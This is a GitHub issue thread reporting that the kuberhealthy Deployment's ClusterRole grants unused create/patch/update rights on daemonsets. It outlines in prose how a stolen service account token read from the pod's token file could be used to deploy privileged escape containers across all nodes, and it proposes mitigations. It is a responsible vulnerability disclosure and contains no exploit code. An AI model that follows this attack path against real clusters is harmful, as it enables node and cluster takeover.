You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Hi community! Our team just found a possible security issue when reading the code. We would like to discuss whether it is a real vulnerability.
Description
The bug is that the Deployment kuberhealthy in the charts has too much RBAC permission than it needs, which may cause some security problems, and the worse one leads cluster being hijacked. The problem is that the kuberhealthy is bound to one clusterrole (clusterrole.yaml#L5) with the following sensitive permissions:
create/patch/update verb of the daemonsets resource (ClusterRole)
After reading the source code of kuberhealthy, I didn't find any Kubernetes API usages using these permissions. However, these unused permissions may have potential risk:
create/patch/update verb of the daemonsets resource (ClusterRole)
A malicious user can create a privileged container with a malicious container image capable of container escape. This would allow him/she gaining ROOT privilege of the worker node the created container deployed. Since the malicious user can control the pod scheduling parameters (e.g., replicas number, node affinity, …), he/she should be able to deploy the malicious container to every (or almost every) worker node. This means the malicious user will be able to control every (or almost every) worker node in the cluster.
The malicious users only need to get the service account token to perform the above attacks. There are several ways have already been reported in the real world to achieve this:
Supply chain attacks: Like the xz backdoor in the recent. The attacker only needs to read /var/run/secrets/kubernetes.io/serviceaccount/token.
RCE vulnerability in the APP: Any remote-code-execution vulnerability that can read local files can achieve this.
Mitigation Suggestion
Create a separate service account and remove all the unnecessary permissions
Write Kyverno or OPA/Gatekeeper policy to:
Limit the container image, entrypoint and commands of newly created pods. This would effectively avoid the creation of malicious containers.
Restrict the securityContext of newly created pods, especially enforcing the securityContext.privileged and securityContext.allowPrivilegeEscalation to false. This would prevent the attacker from escaping the malicious container. In old Kubernetes versions, PodSecurityPolicy can also be used to achive this (it is deprecated in v1.21).
Few Questions
Are these permissions really unused for kuberhealthy?
Would these mitigation suggestions be applicable for the kuberhealthy?
Our team have also found other unneccessary permissions (which is not that sensitive as above, but could also cause some security issues). Please tell us if you are interested in it. We’ll be happy to share it or PR a fix.
References
Several CVEs had already been assigned in other projects for similar issues:
Hi community:
I noticed that this issue hasn't been answered yet, please feel free to let me know if you need more information. Our team is happy to cooperate and do what we can to resolve this issue.
@peschmae Thank you for reminding us of this! We have found that the daemonsetcreate verb is used here during our check. However, after a detailed inspection, we found that this function is only called by cmd/daemonset-check/main.go, but not by cmd/deployment-check/main.go and cmd/kuberhealthy/main.go. Therefore, we only reported the issue with Deployment kuberhealthy.
How did you check the code? Was that done automatically?
We wrote a tool to match the APIs for all resource operations on controller-runtime and client-go SDK, and then checked if it was being used by a workload. We had manually checked each permission we reported.
Hi community! Our team just found a possible security issue when reading the code. We would like to discuss whether it is a real vulnerability.
Description
The bug is that the Deployment
kuberhealthy
in the charts has too much RBAC permission than it needs, which may cause some security problems, and the worse one leads cluster being hijacked. The problem is that thekuberhealthy
is bound to one clusterrole (clusterrole.yaml#L5) with the following sensitive permissions:create/patch/update
verb of thedaemonsets
resource (ClusterRole)After reading the source code of kuberhealthy, I didn't find any Kubernetes API usages using these permissions. However, these unused permissions may have potential risk:
create/patch/update
verb of thedaemonsets
resource (ClusterRole)The malicious users only need to get the service account token to perform the above attacks. There are several ways have already been reported in the real world to achieve this:
/var/run/secrets/kubernetes.io/serviceaccount/token
.Mitigation Suggestion
securityContext
of newly created pods, especially enforcing thesecurityContext.privileged
andsecurityContext.allowPrivilegeEscalation
tofalse
. This would prevent the attacker from escaping the malicious container. In old Kubernetes versions,PodSecurityPolicy
can also be used to achive this (it is deprecated in v1.21).Few Questions
References
Several CVEs had already been assigned in other projects for similar issues:
The text was updated successfully, but these errors were encountered: